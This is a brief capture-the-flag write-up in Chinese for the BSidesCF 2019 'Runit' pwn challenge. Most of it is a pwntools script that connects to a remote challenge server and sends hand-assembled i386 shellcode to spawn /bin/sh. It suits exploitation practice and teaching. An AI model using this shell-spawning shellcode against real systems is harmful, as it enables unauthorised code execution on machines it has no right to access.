[BSidesCF 2019]Runit
查看保护
写入getshell的shellcode即可。或者直接使用pwntools自带的shellcraft.sh
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 28471)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
#shellcode = asm(shellcraft.sh())
shellcode = asm(
'''
xor ecx,ecx
mul ecx
push eax
mov al,0xb
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
int 0x80
'''
)
r.sendline(shellcode)
r.interactive()